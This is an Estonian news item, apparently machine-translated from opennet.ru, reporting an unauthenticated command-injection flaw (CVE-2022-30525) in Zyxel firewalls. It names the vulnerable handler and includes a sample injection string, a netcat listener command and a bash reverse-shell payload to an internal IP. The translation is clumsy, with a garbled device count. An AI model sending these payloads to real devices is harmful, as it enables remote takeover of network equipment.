Haavatavus Zyxeli tulemüürides, mis võimaldab koodi käivitada ilma autentimiseta

Seeria ATP, VPN ja USG FLEX Zyxeli seadmetes on tuvastatud kriitiline haavatavus (CVE-2022-30525), mis on mõeldud tulemüüride, IDS-i ja VPN-i töö korraldamiseks ettevõtetes, mis võimaldab välisel ründajal käivitada koodi ilma autentimiseta kasutajaõigusteta seade. Rünnaku läbiviimiseks peab ründajal olema võimalik saata HTTP/HTTPS-protokolli kasutades seadmesse päringuid. Zyxel parandas ZLD 5.30 püsivara värskenduse haavatavuse. Shodani teenuse andmetel on globaalses võrgus praegu 16213 XNUMX potentsiaalselt haavatavat seadet, mis võtavad vastu HTTP/HTTPS-i kaudu päringuid.

Toiming toimub spetsiaalselt loodud käskude saatmisega veebitöötlejale /ztp/cgi-bin/handler, millele pääseb juurde ilma autentimiseta. Probleemi põhjustab päringu parameetrite nõuetekohase puhastamise puudumine, kui käivitate süsteemis käske, kasutades lib_wan_settings.py teegis kasutatavat ja setWanPortSt toimingu töötlemisel kasutatavat os.system kutset.

Näiteks võib ründaja edastada stringi "; ping 192.168.1.210;" mis viib süsteemis käsu "ping 192.168.1.210" täitmiseni. Käsukestale juurdepääsu saamiseks võite oma süsteemis käivitada "nc -lvnp 1270" ja seejärel algatada pöördühenduse, saates seadmele päringu koos '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Allikas: opennet.ru

Lisa kommentaar